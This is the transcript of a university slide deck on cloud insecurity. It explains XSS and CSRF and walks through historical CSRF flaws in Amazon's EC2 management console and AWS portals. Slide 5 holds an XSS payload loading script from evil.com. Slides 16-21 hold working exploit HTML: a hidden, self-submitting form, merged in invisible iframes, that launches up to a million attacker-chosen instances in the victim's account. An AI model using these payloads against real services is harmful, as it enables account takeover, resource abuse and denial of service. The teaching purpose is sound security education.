Cloud Insecurity

Views: 3,059

A short presentation for a university class.

Published in: Technology, Business
Transcript

Slide 1. Marco Arena
Slides 2-3. Outline (slide 3 repeats slide 2 verbatim)
  • Recalls (XSS and CSRF)
  • Attacks against Amazon EC2 management console
  • Amazon EC2 real vulnerabilities
    – Web management console
    – Amazon Web Services (AWS) portals
  • Conclusions
Slide 4. Recalls
  • An XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack: the website becomes the vector through which attackers reach their victims.
  • XSS is today’s most widely reported software vulnerability.
Slide 5. Recalls
  • XSS, a simple example. Server-side JSP:

        <c:if test="${param.sayHello}">
          Hello ${param.name}!
        </c:if>

    Evil parameter (URL-encoded):

        %3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E

    Result (the parameter is reflected into the page unencoded):

        Hello <script src="http://evil.com/evil.js"></script>
Slide 6. Recalls
  • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated.
  • CSRF tricks the victim into loading a page that contains a malicious request.
Slide 7. Recalls
  • CSRF, a simple example (diagram): the User, who has an active session on the Trusted blog (i.e. MySpace), visits the Evil Site, whose page contains:

        ...
        <img src="http://trustedblog.com/addfriend.php?id=12345"/>
        ...

    The browser sends the request to the trusted blog with the user’s session attached.
Slide 8. Outline (section divider; the outline of slide 2 repeated)
Slide 9. Attacks against EC2
  • The Amazon EC2 cloud is managed via web services and web interface consoles.
  • The web management console asks the user to provide her Amazon.com username and password.
  • The login page is hosted on the Amazon.com domain, so it is exposed to any web application vulnerability found anywhere on that domain.
Slide 10. Attacks against EC2
  • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
Slide 11. Attacks against EC2
  • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
Slide 12. Outline (section divider; the outline of slide 2 repeated)
Slide 13. Amazon EC2 real vulnerabilities
  • The security of AMI instances depends on the security of the web management console.
  • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
Slide 14. Outline (section divider; the outline of slide 2 repeated)
Slide 15. Web management console vulnerabilities
  • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account.
  • Two parts:
    – Initialize an evil AMI;
    – Launch the instance under the victim’s EC2 account.
Slides 16-17. Web management console vulnerabilities
  initialize.html (slide 17 annotates the <img> as a cross-domain image tag):

        <html>
        <body>
        <img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
        </body>
        </html>
Slide 18. Web management console vulnerabilities
  launch.html:

        <html>
        <body>
        <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
          <input type="hidden" name="action.MinCount" value="1" />
          <input type="hidden" name="action.InstanceType" value="m1.small" />
          <input type="hidden" name="action.SecurityGroup" value="default" />
          <input type="hidden" name="action.SecurityGroup" value="Webserver" />
          <input type="hidden" name="action.MaxCount" value="1000000" />
          <input type="hidden" name="action.ImageId" value="ami-00031337" />
          <input type="hidden" name="mbtc" value="50084" />
          <input type="hidden" name="region" value="us-east-1" />
        </form>
        <script>
          setTimeout("document.LaunchEvilAMI.submit()", 5000);
        </script>
        </body>
        </html>
Slide 19. Web management console vulnerabilities (title only)
Slides 20-21. Web management console vulnerabilities
  Merge (slide 21 annotates: the browser will not display the reply of the web server, since both frames are 0×0):

        <html>
        <body>
        <iframe src="./initialize.html" height="0" width="0"></iframe>
        <iframe src="./launch.html" height="0" width="0"></iframe>
        </body>
        </html>
Slide 22. Web management console vulnerabilities
  • The second vulnerability terminates arbitrary AMIs being run by the victim.
  • After the attack is launched, the victim can see that the instance was terminated without her consent.
Slide 23. Web management console vulnerabilities
  • The last vulnerability involves the deletion of AMI key pairs.
  • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
Slide 24. Outline (section divider; the outline of slide 2 repeated)
Slides 25-26. AWS portals vulnerabilities (slide 26 repeats slide 25 verbatim)
  • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration.
  • The three most common methods of authentication are:
    – a username/password combination;
    – an Access Key ID/Secret Access Key combination;
    – X.509 certificates.
Slide 27. AWS portals vulnerabilities
  • The first attack against AWS generates a new access key for the EC2 user’s session.
  • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account.
  • The attacker can create a temporary denial of service, since the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
Slide 28. AWS portals vulnerabilities
  • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user.
  • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
Slide 29. Outline (section divider; the outline of slide 2 repeated)
Slide 30. Conclusions
  • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users.
  • But it does not magically protect application logic from abuse or prevent attacks against the application level.
Slide 31. Conclusions
  • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines.
  • Cloud providers must fix their security bugs and perform continuous code review.
Slide 32. References
  • Nitesh Dhanjani, Billy Rios, and Brett Hardin. Hacking: The Next Generation. O’Reilly, 2009.
  • Rich Cannings, Himanshu Dwivedi, Zane Lackey. Hacking Exposed Web 2.0. McGraw-Hill, 2008.
  • Brian Chess, Jacob West. Secure Programming with Static Analysis. Addison-Wesley, 2007.
